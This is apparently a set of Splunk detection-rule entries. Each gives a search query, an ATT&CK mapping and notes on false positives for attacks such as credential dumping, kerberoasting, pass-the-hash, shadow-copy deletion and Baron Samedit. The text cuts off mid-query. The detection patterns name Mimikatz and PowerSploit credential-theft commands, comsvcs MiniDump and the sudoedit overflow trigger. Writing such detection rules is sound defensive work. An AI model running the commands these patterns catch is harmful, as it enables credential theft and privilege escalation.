| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)CRYPTO::Certificates/)=true OR match_regex(cmd_line, /(?i)CRYPTO::keys/)=true OR match_regex(cmd_line, /(?i)kerberos::list/)=true OR match_regex(cmd_line, /(?i)kerberos::tgt/)=true OR match_regex(cmd_line, /(?i)lsadump::sam/)=true OR match_regex(cmd_line, /(?i)lsadump::secrets/)=true OR match_regex(cmd_line, /(?i)lsadump::cache/)=true OR match_regex(cmd_line, /(?i)lsadump::lsa/)=true OR match_regex(cmd_line, /(?i)lsadump::trust/)=true OR match_regex(cmd_line, /(?i)lsadump::backupkeys/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction indicative of use of powersploit modules

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. PowerSploit is a collection of Microsoft PowerShell modules commonly employed in exploits.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ApplicationHost/)=true OR match_regex(cmd_line, /(?i)Get-CachedGPPPassword/)=true OR match_regex(cmd_line, /(?i)Get-GPPAutologon/)=true OR match_regex(cmd_line, /(?i)Get-GPPPassword/)=true OR match_regex(cmd_line, /(?i)Get-RegistryAutoLogon/)=true OR match_regex(cmd_line, /(?i)Get-SiteListPassword/)=true OR match_regex(cmd_line, /(?i)Get-SPNTicket/)=true OR match_regex(cmd_line, /(?i)Request-SPNTicket/)=true OR match_regex(cmd_line, /(?i)Get-VaultCredential/)=true OR match_regex(cmd_line, /(?i)Invoke-Kerberoast/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Credential extraction native microsoft debuggers peek into the kernel

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Native Microsoft debuggers, such as kd, ntkd, livekd and windbg, can be leveraged to read credential material directly from memory and process dumps.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"), "string", null) | where cmd_line != null AND parent_process_name != null AND process_name != null AND ( match_regex(parent_process_name, /(?i)ntkd\.exe/)=true OR match_regex(parent_process_name, /(?i)livekd\.exe/)=true ) AND match_regex(process_name, /(?i)conhost\.exe/)=true AND match_regex(cmd_line, /(?i)0xffffffff/)=true AND match_regex(cmd_line, /(?i)\-ForceV1/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, using debuggers this way may be indicative of developers analyzing crash dumps of their code. Note, even for developers this is an unusual way of working on code - debuggers are mostly used to step through code, not analyze its crash dumps.

Reference


Test Dataset

version: 1


Credential extraction native microsoft debuggers via z command line option

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. Native Microsoft debuggers, such as kd, ntkd, livekd and windbg, can be leveraged to read credential material directly from memory and process dumps.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null), process_name=ucast(map_get(input_event, "process_name"), "string", null) | where cmd_line != null AND process_name != null AND ( match_regex(process_name, /^(?i)ntkd\.exe/)=true OR match_regex(process_name, /^(?i)kd\.exe/)=true ) AND match_regex(cmd_line, /(?i)\-z\s+/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • process_name
  • _time
  • dest_device_id
  • dest_user_id
  • process


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, using debuggers this way may be indicative of developers analyzing crash dumps of their code. Note, even for developers this is an unusual way of working on code - debuggers are mostly used to step through code, not analyze its crash dumps.

Reference

Test Dataset

version: 1


Credential extraction via get-addbaccount module present in powersploit and dsinternals

Credential extraction is often an illegal recovery of credential material from secured authentication resources and repositories. This process may also involve decryption or other transformations of the stored credential material. PowerSploit and DSInternals are common exploit APIs offering PowerShell modules for various exploits of Windows and Active Directory environments.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003
  • Last Updated: 2020-10-18

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND match_regex(cmd_line, /(?i)Get-ADDBAccount/)=true AND match_regex(cmd_line, /(?i)\-dbpath[\s;:\.\ |]+/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • dest_device_id
  • dest_user_id
  • process
  • _time


ATT&CK

ID Technique Tactic
T1003 OS Credential Dumping Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset

version: 1


Deleting shadow copies

The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1490
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe OR Processes.process_name=wmic.exe) Processes.process=*delete* Processes.process=*shadow* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `deleting_shadow_copies_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1490 Inhibit System Recovery Impact


Kill Chain Phase

  • Actions on Objectives


Known False Positives

vssadmin.exe and wmic.exe are standard applications shipped with modern versions of windows. They may be used by administrators to legitimately delete old backup copies, although this is typically rare.

Reference

Test Dataset


version: 4


Detect activity related to pass the hash attacks

This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts at using the Pass-the-Hash technique.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1550.002
  • Last Updated: 2020-10-15

Search

`wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp WorkstationName=WORKSTATION NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo) | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by EventCode, Logon_Type, WorkstationName, user, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_activity_related_to_pass_the_hash_attacks_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ingest your Windows Security Event logs and leverage the latest TA for Windows.

Required field

ATT&CK

ID Technique Tactic
T1550.002 Pass the Hash Defense Evasion, Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate.

Reference

Test Dataset


version: 5


Detect baron samedit cve-2021-3156

This search detects the heap-based buffer overflow of sudoedit

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-27

Search

`linux_hosts` | search "sudoedit -s \\" | `detect_baron_samedit_cve_2021_3156_filter`

Associated Analytic Story


How To Implement

Splunk Universal Forwarder running on Linux systems, capturing logs from the /var/log directory. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

unknown

Reference


Test Dataset

version: 1


Detect baron samedit cve-2021-3156 segfault

This search detects the heap-based buffer overflow of sudoedit

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-29

Search

`linux_hosts` | search sudoedit segfault | stats count min(_time) as firstTime max(_time) as lastTime by host | search count > 5 | `detect_baron_samedit_cve_2021_3156_segfault_filter`

Associated Analytic Story


How To Implement

Splunk Universal Forwarder running on Linux systems (tested on Centos and Ubuntu), where segfaults are being logged. This also captures instances where the exploit has been compiled into a binary. The detection looks for greater than 5 instances of sudoedit combined with segfault over your search time period on a single host

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

If sudoedit is throwing segfaults for other reasons this will pick those up too.

Reference


Test Dataset

version: 1


Detect baron samedit cve-2021-3156 via osquery

This search detects the heap-based buffer overflow of sudoedit

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1068
  • Last Updated: 2021-01-28

Search

`osquery_process` | search "columns.cmdline"="sudoedit -s \\*" | `detect_baron_samedit_cve_2021_3156_via_osquery_filter`

Associated Analytic Story


How To Implement

OSQuery installed and configured to pick up process events (info at https://osquery.io) as well as using the Splunk OSQuery Add-on https://splunkbase.splunk.com/app/4402. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Exploitation


Known False Positives

unknown

Reference


Test Dataset

version: 1


Detect computer changed with anonymous account

This search looks for Event Code 4742 (Computer Change) or EventCode 4624 (An account was successfully logged on) with an anonymous account.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1210
  • Last Updated: 2020-09-18

Search

`wineventlog_security` EventCode=4624 OR EventCode=4742 TargetUserName="ANONYMOUS LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName) as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter`

Associated Analytic Story


How To Implement

This search requires audit computer account management to be enabled on the system in order to generate Event ID 4742. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Event Logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1210 Exploitation of Remote Services Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None thus far found

Reference


Test Dataset

version: 1


Detect credential dumping through lsass access

This search looks for reading lsass memory consistent with credential dumping.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-03

Search

`sysmon` EventCode=10 TargetImage=*lsass.exe (GrantedAccess=0x1010 OR GrantedAccess=0x1410) | stats count min(_time) as firstTime max(_time) as lastTime by Computer, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_credential_dumping_through_lsass_access_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 10 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The activity may be legitimate. Other tools can access lsass for legitimate reasons, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.

Reference

Test Dataset


version: 3


Detect dump lsass memory using comsvcs

This search detects the memory of lsass.exe being dumped for offline credential theft attack.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1003.003
  • Last Updated: 2020-09-15

Search

| from read_ssa_enriched_events() | eval tenant=ucast(map_get(input_event, "_tenant"), "string", null), machine=ucast(map_get(input_event, "dest_device_id"), "string", null), process_name=lower(ucast(map_get(input_event, "process_name"), "string", null)), timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), process=lower(ucast(map_get(input_event, "process"), "string", null)) | where process_name LIKE "%rundll32.exe%" AND match_regex(process, /(?i)comsvcs.dll[,\s]+MiniDump/)=true | eval start_time = timestamp, end_time = timestamp, entities = mvappend(machine), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including Windows command line logging. You can see how we test this with [Event Code 4688](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4688a) on the [attack_range](https://github.com/splunk/attack_range/blob/develop/ansible/roles/windows_common/tasks/windows-enable-4688-cmd-line-audit.yml).

Required field

  • process_name
  • _tenant
  • _time
  • dest_device_id
  • process


ATT&CK

ID Technique Tactic
T1003.003 NTDS Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Detect excessive account lockouts from endpoint

This search identifies endpoints that have caused a relatively high number of account lockouts in a short period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.002
  • Last Updated: 2020-11-09

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Changes.user) as user from datamodel=Change.All_Changes where nodename=All_Changes.Account_Management All_Changes.result="lockout" by All_Changes.dest All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_account_lockouts_from_endpoint_filter`

Associated Analytic Story


How To Implement

You must ingest your Windows security event logs in the `Change` datamodel under the nodename is `Account_Management`, for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment. \

**Splunk>Phantom Playbook Integration**\

If Splunk>Phantom is also configured in your environment, a Playbook called "Excessive Account Lockouts Enrichment and Response" can be configured to run when any results are found by this detection search. The Playbook executes the Contextual and Investigative searches in this Story, conducts additional information gathering on Windows endpoints, and takes a response action to shut down the affected endpoint. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \ (Playbook Link:`https://my.phantom.us/4.1/playbook/excessive-account-lockouts-enrichment-and-response/`).\


Required field

ATT&CK

ID Technique Tactic
T1078.002 Domain Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It's possible that a widely used system, such as a kiosk, could cause a large number of account lockouts.

Reference

Test Dataset


version: 5


Detect excessive user account lockouts

This search detects user accounts that have been locked out a relatively high number of times in a short period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Change
  • ATT&CK: T1078.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Change.All_Changes where nodename=All_Changes.Account_Management All_Changes.result="lockout" by All_Changes.user All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_user_account_lockouts_filter`

Associated Analytic Story


How To Implement

ou must ingest your Windows security event logs in the `Change` datamodel under the nodename is `Account_Management`, for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.003 Local Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

It is possible that a legitimate user is experiencing an issue causing multiple account login failures leading to lockouts.

Reference

Test Dataset


version: 3


Detect html help renamed

The following analytic identifies a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM). This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Validate it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

`sysmon` EventID=1 OriginalFileName=HH.exe NOT process_name=hh.exe | stats count min(_time) as firstTime max(_time) as lastTime by Computer, User, parent_process_name, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_renamed_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed hh.exe may be used.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely a renamed instance of hh.exe will be used legitimately, filter as needed.

Reference


Test Dataset


version: 1


Detect html help spawn child process

The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_spawn_child_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications (ex. web browsers) may spawn a child process. Filter as needed.

Reference


Test Dataset


version: 1


Detect html help url in command line

The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=hh.exe Processes.process=*http* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may retrieve a CHM remotely, filter as needed.

Reference


Test Dataset


version: 1


Detect html help using infotech storage handlers

The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.001
  • Last Updated: 2021-02-11

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=hh.exe Processes.process IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_using_infotech_storage_handlers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.001 Compiled HTML File Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It is rare to see instances of InfoTech Storage Handlers being used, but it does happen in some legitimate instances. Filter as needed.

Reference


Test Dataset


version: 1


Detect kerberoasting

This search detects a potential kerberoasting attack via service principal name requests

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1558.003
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval _time=map_get(input_event, "_time"), EventCode=map_get(input_event, "event_code"), TicketOptions=map_get(input_event, "ticket_options"), TicketEncryptionType=map_get(input_event, "ticket_encryption_type"), ServiceName=map_get(input_event, "service_name"), ServiceID=map_get(input_event, "service_id") | where EventCode="4769" AND TicketOptions="0x40810000" AND TicketEncryptionType="0x17" | first_time_event input_columns=["EventCode","TicketOptions","TicketEncryptionType","ServiceName","ServiceID"] | where first_time_EventCode_TicketOptions_TicketEncryptionType_ServiceName_ServiceID | eval start_time=_time, end_time=_time, body="TBD", entities="TBD" | select start_time, end_time, entities, body | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

The test data is converted from Windows Security Event logs generated from Attach Range simulation and used in SPL search and extended to SPL2

Required field

  • service_name
  • _time
  • event_code
  • ticket_encryption_type
  • service_id
  • ticket_options


ATT&CK

ID Technique Tactic
T1558.003 Kerberoasting Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Older systems that support kerberos RC4 by default NetApp may generate false positives

Reference

  • Initial ESCU implementation by Jose Hernandez and Patrick Bareiss


Test Dataset

version: 1


Detect mshta url in command line

This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mshta.exe (Processes.process="*http://*" OR Processes.process="*https://*") by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_url_in_command_line_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

It is possible legitimate applications may perform this behavior and will need to be filtered.

Reference


Test Dataset


version: 1


Detect new local admin account

This search looks for newly created accounts that have been elevated to local administrators.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1136.001
  • Last Updated: 2020-07-08

Search

`wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators) | transaction member_id connected=false maxspan=180m | rename member_id as user | stats count min(_time) as firstTime max(_time) as lastTime by user dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_local_admin_account_filter`

Associated Analytic Story


How To Implement

You must be ingesting Windows event logs using the Splunk Windows TA and collecting event code 4720 and 4732

Required field

ATT&CK

ID Technique Tactic
T1136.001 Local Account Persistence


Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Known False Positives

The activity may be legitimate. For this reason, it's best to verify the account with an administrator and ask whether there was a valid service request for the account creation. If your local administrator group name is not "Administrators", this search may generate an excessive number of false positives

Reference

Test Dataset


version: 2


Detect oulook exe writing a zip file

This search looks for execution of process `outlook.exe` where the process is writing a `.zip` file to the disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1566.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe OR Processes.process_name=explorer.exe by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest Processes.process_name Processes.parent_process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id | rename parent_process_id as outlook_id | join malicious_id type=inner[ | tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where (Filesystem.file_path=*zip* OR Filesystem.file_name=*.lnk ) AND (Filesystem.file_path=C:\\Users* OR Filesystem.file_path=*Local\\Temp*) by _time span=5m Filesystem.process_id Filesystem.file_hash Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename process_id as malicious_id | fields malicious_id outlook_id dest file_path file_name file_hash count file_id] | table firstTime lastTime user malicious_id outlook_id process_name parent_process_name file_name file_path | where file_name != "" | 